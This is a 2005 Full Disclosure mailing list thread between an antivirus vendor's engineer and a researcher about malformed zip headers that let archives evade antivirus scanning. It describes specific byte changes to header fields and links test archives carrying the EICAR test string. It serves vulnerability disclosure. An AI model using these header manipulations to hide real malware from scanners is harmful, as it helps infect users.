Full Disclosure mailing list archives

RE: Re: Multiple AV Vendor IncorrectCRC32BypassVulnerability.

From: "Steve Scholz" <steve_scholz () sybari com>
Date: Sat, 12 Mar 2005 10:33:48 -0500

Sat Mar 12 10:26:35 2005 (4320-4292), "INFORMATION: Internet scan found
virus:

   Folder: SMTP Messages\Internal

   Message: test b

   File: Antigen_b.zip

   Incident: Large uncompressed size

   State: Removed"

The Antigen_s.zip does not contain a valid Eicar this info when repaired
and opened is X5O!P%@AP[4\PZX

We did catch it with a file filter.

Sat Mar 12 10:32:29 2005 (4320-4292), "INFORMATION: Internet scan found
virus:

   Folder: SMTP Messages\Internal

   Message: Fw: test

   File: Antigen_s.zip->eicar.com

   Incident: FILE FILTER=  *.com

   State: Removed"

What was your intent with these files?

Steve Scholz
Corporate Sales Engineer-North America
Sybari Software, Inc.
631-630-8556 Direct
516-903-2464 Mobile

Email:  Steve_scholz () sybari com

MSN IM:Steve_Scholz () Msn com (email never checked) 





-----Original Message-----
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of bipin
gautam
Sent: Saturday, March 12, 2005 2:58 AM
To: Steve Scholz; vuln () secunia com
Cc: full-disclosure () lists grok org uk; vuldb () securityfocus com
Subject: RE: [Full-disclosure] Re: Multiple AV Vendor
IncorrectCRC32BypassVulnerability.

While it might be a vulnerability if the file is
extracted which it hasto be to be executed the 
desktop scanner will detect it at that time. 
Multiple layers of defense is your best option 
As far as number 3 Antigen detects Eicar.


YAP, i never reported Antigen vulnerable to the 3'rd
one.

Though, In Local file header if you modify "general
purpose bit flag" 7th & 8'th byte of a zip archive
with \x2f Antigen is also seem to be vulnerable! While
most unzip utilities are transperently able to extract
SUCH* archive without any problem! Though,currently my
only source of verifying this is via
www.virustotal.com and some others. [Go, TRY IT
THEER!]
http://www.geocities.com/visitbipin/gpbf.zip

I can see if there is anything
else that you do not
think Antigen is doing correctly.


 (O;

For instant,
In the 'local file header" & "data descriptor" if you
change the  compressed size and uncompressed size to
ZERO[iDEFENSE] or greater than the actual file size or
less than the actual file size still there are many AV
that can't scan the file properly. 
http://www.geocities.com/visitbipin/Antigen_b.zip
http://www.geocities.com/visitbipin/Antigen_s.zip

Moreover there are unzip utilities that goes to a loop
if the filesize is changed to ffffffff ! Lets hope, AV
don't have such faulty code!

Just run the file through www.virustotal.com and
you'll see. (I know, they aren't using up-to-date scan
engine)

Thanks,
bipin





                
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new resources site!
http://smallbusiness.yahoo.com/resources/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Current thread:

RE: Re: Multiple AV Vendor IncorrectCRC32BypassVulnerability. Steve Scholz (Mar 12)
- Re: [Private]Multiple AV Vendor IncorrectCRC32BypassVulnerability. bipin gautam (Mar 12)